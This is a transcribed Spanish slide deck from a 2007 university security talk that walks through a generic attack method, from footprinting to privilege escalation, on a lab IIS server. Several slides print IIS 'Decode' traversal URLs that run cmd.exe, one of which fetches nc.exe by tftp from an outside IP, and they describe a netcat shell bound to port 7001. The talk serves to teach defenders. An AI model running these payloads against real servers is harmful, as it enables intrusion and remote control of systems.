La Praxis del Cracker Miguel Torrealba S. ([email protected]) Universidad Simón Bolívar Venezuela...
-
Upload
maritza-soliz -
Category
Documents
-
view
27 -
download
5
Transcript of La Praxis del Cracker Miguel Torrealba S. ([email protected]) Universidad Simón Bolívar Venezuela...
![Page 1: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/1.jpg)
La Praxis del Cracker
Miguel Torrealba S.([email protected])
Universidad Simón Bolívar
Venezuela
LACNIC X - Marzo 2007 - Margarita
![Page 2: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/2.jpg)
Laboratorio de Seguridad en Tecnología de la Información
USBGISTI
![Page 3: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/3.jpg)
“La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas”.
Simson Garfinkel y Eugene Spafford (1999)
![Page 4: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/4.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 5: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/5.jpg)
MÉTODO GENÉRICO DE ATAQUE
Footprinting
(Hallar el Rastro)
La Praxis del Cracker – MTS – Margarita 2007
![Page 6: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/6.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 7: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/7.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 8: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/8.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 9: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/9.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 10: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/10.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 11: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/11.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 12: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/12.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 13: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/13.jpg)
MÉTODO GENÉRICO DE ATAQUE
Scanning
(Exploración)
La Praxis del Cracker – MTS – Margarita 2007
![Page 14: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/14.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 15: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/15.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 16: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/16.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 17: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/17.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 18: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/18.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 19: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/19.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 20: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/20.jpg)
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve
- La salida ya provee un indicio del “servidor web” que se está ejecutando y del puerto que está atendiendo las peticiones
- Empleando otras herramientas como “nmap” de Fyodor, que identifican el sistema operativo usando “TCP Stack Fingerprinting” se puede obtener una información más confiable
La Praxis del Cracker – MTS – Margarita 2007
![Page 21: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/21.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 22: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/22.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 23: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/23.jpg)
MÉTODO GENÉRICO DE ATAQUE
Enumeration
(Enumeración)
La Praxis del Cracker – MTS – Margarita 2007
![Page 24: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/24.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 25: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/25.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 26: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/26.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 27: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/27.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 28: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/28.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 29: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/29.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 30: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/30.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 31: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/31.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 32: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/32.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 33: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/33.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 34: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/34.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 35: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/35.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 36: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/36.jpg)
MÉTODO GENÉRICO DE ATAQUE
Gainning Access
(Ganar Acceso)
La Praxis del Cracker – MTS – Margarita 2007
![Page 37: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/37.jpg)
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\
- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima.
- Para lograr eso solo requiere ejecutar el comando “dir” de la consola de comandos a través del servidor web
La Praxis del Cracker – MTS – Margarita 2007
![Page 38: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/38.jpg)
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\- ..%255c.. = ..(%25)5c.. = ..%5c .. = ..(%5c).. = .. \ ..http://jeremias.nul.usb.ve/scripts/..\../..\../winnt/system32/cmd.exe?c+dir+c:\
- Estructura lógica del disco de Jeremias:
C: \ Inetpub \ scripts \
Winnt \ system32 \
La Praxis del Cracker – MTS – Margarita 2007
![Page 39: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/39.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 40: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/40.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 41: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/41.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 42: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/42.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 43: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/43.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 44: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/44.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 45: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/45.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 46: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/46.jpg)
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+c:\winnt/system32/tftp.exe+-i+159.90.31.161+get+nc.exe
- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima.
La Praxis del Cracker – MTS – Margarita 2007
![Page 47: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/47.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 48: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/48.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 49: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/49.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 50: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/50.jpg)
MÉTODO GENÉRICO DE ATAQUE
http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\Inetpub\scripts
- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa.
La Praxis del Cracker – MTS – Margarita 2007
![Page 51: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/51.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 52: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/52.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Hora de transferir un “exploit”- “Httpodbc.dll” es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad “Decode” del IIS 4.0 y 5.0
- Para el “servidor web” del sistema de la víctima este programa parecerá un “código script” que ha sido colocado para que los usuarios finales lo ejecuten
La Praxis del Cracker – MTS – Margarita 2007
![Page 53: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/53.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 54: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/54.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 55: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/55.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 56: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/56.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 57: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/57.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 58: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/58.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 59: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/59.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 60: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/60.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del “servidor web” IIS 4.0 o 5.0
La Praxis del Cracker – MTS – Margarita 2007
![Page 61: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/61.jpg)
MÉTODO GENÉRICO DE ATAQUE
Escalating Privilege
(Escalar Privilegios)
La Praxis del Cracker – MTS – Margarita 2007
![Page 62: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/62.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 63: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/63.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Con esta orden se procede a ejecutar “NETCAT” la “navaja del ejército suizo” de “Hackers” de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima
• Un “nuevo” servicio de comandos queda escuchando desde ese instante
La Praxis del Cracker – MTS – Margarita 2007
![Page 64: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/64.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 65: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/65.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 66: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/66.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 67: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/67.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 68: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/68.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Desde una consola de comandos local –el atacante- ejecuta ahora un “telnet” al puerto 7001 del sistema de la víctima
• La idea es disponer de un “login remoto” que permita ejecutar comandos en el sistema víctima
• Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un “terminal virtual en la red”
La Praxis del Cracker – MTS – Margarita 2007
![Page 69: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/69.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 70: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/70.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Con el Telnet se ha establecido una conexión TCP a la consola de comandos que “escucha” peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica
• Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio “transparente”
• Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local
La Praxis del Cracker – MTS – Margarita 2007
![Page 71: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/71.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 72: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/72.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
